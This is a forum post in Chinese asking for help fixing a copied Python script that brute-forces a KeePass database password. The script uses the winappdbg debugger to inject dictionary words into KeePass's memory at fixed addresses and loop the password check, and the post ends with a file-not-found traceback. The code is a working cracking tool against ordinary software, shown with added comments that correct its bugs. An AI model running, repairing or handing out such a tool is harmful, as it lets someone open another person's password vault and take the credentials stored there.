我一直在尝试运行下面的脚本来恢复 KeePassX 的密码。问题是每次运行它都会遇到很多编程上的问题,而我并不是程序员,即使查了资料也很难找出错在哪里……
如果有人能帮我让这个脚本成功运行,我将不胜感激:
from winappdbg import Debug
from time import strftime
import time
import os.path
# State shared by the breakpoint callbacks below: the position in the
# wordlist, the candidate currently being tried, the loaded wordlist, and
# the register values snapshotted by action_0 for action_3 to restore.
counter = 0
word = ""
words = []
r_eax = r_ecx = r_edx = 0
# Width of the password slot the main script pads into the "-pw:" argument;
# action_1 never writes more than WORD_SIZE-1 characters plus a NUL into it.
WORD_SIZE = 20
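#Save the state of the registers
def action_0(event):
    """Breakpoint callback: snapshot Eax/Ecx/Edx of the stopped thread.

    The main script installs this at 0x004DC395.  The values are kept in
    the module globals r_eax/r_ecx/r_edx so that action_3 can put them
    back before steering execution to that address again.

    Args:
        event: winappdbg breakpoint event; only get_thread() is used.
    """
    # The pasted original declared ``r_rdx`` here, so the Edx value ended
    # up in a function local and action_3 always restored the initial 0.
    global r_eax, r_ecx, r_edx
    aThread = event.get_thread()
    r_eax = aThread.get_register("Eax")
    r_ecx = aThread.get_register("Ecx")
    r_edx = aThread.get_register("Edx")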
#Write the word
def action_1( event ):
    """Breakpoint callback: copy the current dictionary word into the target.

    The main script installs this at 0x004D77A0.  Ecx of the stopped thread
    is taken as the destination address; ``words[counter]`` has its newline
    characters removed, is cut to WORD_SIZE-1 characters and is written with
    a trailing NUL — at most WORD_SIZE bytes, which is the padding the main
    script leaves after ``-pw:``.  The stripped candidate is also stored in
    the module global ``word`` so action_2 can print it.

    Args:
        event: winappdbg breakpoint event; get_thread() and get_process()
            are used.
    """
    global word
    thread = event.get_thread()
    process = event.get_process()
    destination = thread.get_register("Ecx")
    candidate = words[counter].replace("\n", "")[:WORD_SIZE - 1]
    #candidate = candidate.lower() #optional
    word = candidate
    process.poke(destination, candidate + "\0")
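#Check the flag state
def action_2( event ):
    """Breakpoint callback: read the comparison result and advance the search.

    The main script installs this at 0x004D6684.  The Zero flag of the
    stopped thread decides the outcome: set is treated as a match ("Correct"
    is printed and the target process is killed).  Otherwise "Incorrect" is
    printed and, while words remain, ``counter`` is advanced and Eip is moved
    to 0x004D6699 so the next candidate is tried; after the last word the
    process is killed as well.

    Args:
        event: winappdbg breakpoint event; get_thread() and get_process()
            are used.
    """
    global counter
    thread = event.get_thread()
    matched = thread.get_flag_value(thread.Flags.Zero)
    if matched:
        print('Counter: ' + repr(counter) + ' - Correct: ' + word)
        event.get_process().kill()
        return
    print('Counter: ' + repr(counter) + ' - Incorrect: ' + word)
    # The pasted original read ``if counter<:`` / ``len(words)-1`` — a syntax
    # error; the bound is "at least one more word remains".
    if counter < len(words) - 1:
        counter += 1
        thread.set_register("Eip", 0x004D6699)
    else:
        event.get_process().kill()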
#Restore the registers to the original state
def action_3( event ):
    """Breakpoint callback: put back the registers saved by action_0.

    The main script installs this at 0x004DC39A.  Eax, Ecx and Edx are
    reloaded from the module globals r_eax/r_ecx/r_edx and Eip is set to
    0x004DC395, the address action_0's breakpoint sits on, so the target
    re-enters that stretch of code.  Whether that stretch is the password
    comparison is not visible here — it is inferred only from the
    "Correct"/"Incorrect" labels action_2 prints.

    Args:
        event: winappdbg breakpoint event; only get_thread() is used.
    """
    thread = event.get_thread()
    restore = (
        ("Eax", r_eax),
        ("Ecx", r_ecx),
        ("Edx", r_edx),
        ("Eip", 0x004DC395),
    )
    for name, value in restore:
        thread.set_register(name, value)
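#Specify a dictionary here
# One candidate per line; action_1 strips the newline characters itself.
with open('dic.txt', "r") as dictionary:
    words = dictionary.readlines()
print("[+] Words Loaded: %d" % len(words))
#Specify a key file
keyfile = "key"
# Bind these before the try so the finally block can always run: the
# original left ``debug`` and ``t1`` unbound whenever Debug() or execv()
# raised before reaching them.
debug = None
# time.clock() is what the Python 2.7 original used (see the C:\Python27
# traceback); it no longer exists in Python 3.8+.
t1 = time.clock()
try:
    debug = Debug()
    # action_1 writes at most WORD_SIZE-1 characters plus a NUL, so the
    # WORD_SIZE bytes of padding after "-pw:" (4 characters) hold any word.
    password_slot = '-pw:'.ljust(WORD_SIZE + 4)
    if os.path.isfile(keyfile):
        print("[+] Keyfile Loaded: '" + keyfile + "'")
        argv = ['KeePass.exe', 'keepassdb.kdb', '-keyfile:' + keyfile, password_slot]
    else:
        print("[+] Specified keyfile '" + keyfile + "' does not exist, ignoring argument")
        argv = ['KeePass.exe', 'keepassdb.kdb', password_slot]
    # NOTE(review): the traceback on this page ends in CreateProcessA with
    # Windows error 2 (file not found).  A bare "KeePass.exe" is resolved
    # against the working directory and PATH, so the executable must be
    # reachable from where the script is run, or given as a full path.
    aProcess = debug.execv(argv)
    #Set the breakpoints
    pid = aProcess.get_pid()
    debug.break_at(pid, 0x004DC395, action_0)
    debug.break_at(pid, 0x004D77A0, action_1)
    debug.break_at(pid, 0x004D6684, action_2)
    debug.break_at(pid, 0x004DC39A, action_3)
    #Wait for the debugee to finish
    debug.loop()
finally:
    if debug is not None:
        debug.stop()
    print('Finished in ' + repr(time.clock() - t1) + ' seconds!')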
运行脚本时我得到:
C:\Python27>python.exe force.py
[+] Words Loaded: 5
[+] Keyfile Loaded: 'key'
Traceback (most recent call last):
File "force.py", line 86, in <module>
aProcess = debug.execv(['KeePass.exe', 'keepassdb.kdb', '-keyfile:' + keyfile
, '-pw:'.ljust(WORD_SIZE+4)])
File "C:\Python27\lib\site-packages\winappdbg\debug.py", line 317, in execv
dwParentProcessId = dwParentProcessId)
File "C:\Python27\lib\site-packages\winappdbg\debug.py", line 371, in execl
dwParentProcessId = dwParentProcessId,
File "C:\Python27\lib\site-packages\winappdbg\system.py", line 1259, in start_
process
lpStartupInfo = lpStartupInfo)
File "C:\Python27\lib\site-packages\winappdbg\win32\defines.py", line 164, in
__call__
return self.fn_ansi(*argv, **argd)
File "C:\Python27\lib\site-packages\winappdbg\win32\kernel32.py", line 2630, i
n CreateProcessA
_CreateProcessA(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThr
eadAttributes, bool(bInheritHandles), dwCreationFlags, lpEnvironment, lpCurrentD
irectory, ctypes.byref(lpStartupInfo), ctypes.byref(lpProcessInformation))
File "C:\Python27\lib\site-packages\winappdbg\win32\defines.py", line 120, in
RaiseIfZero
raise ctypes.WinError()
WindowsError: [Error 2] O sistema não pode encontrar o arquivo especificado. (which means "the system cannot find the file specified" in Portuguese)
注意:该脚本是从http://blog.q-protex.com/2010/03/14/keepass-self-bruteforce/
复制的。提前致谢!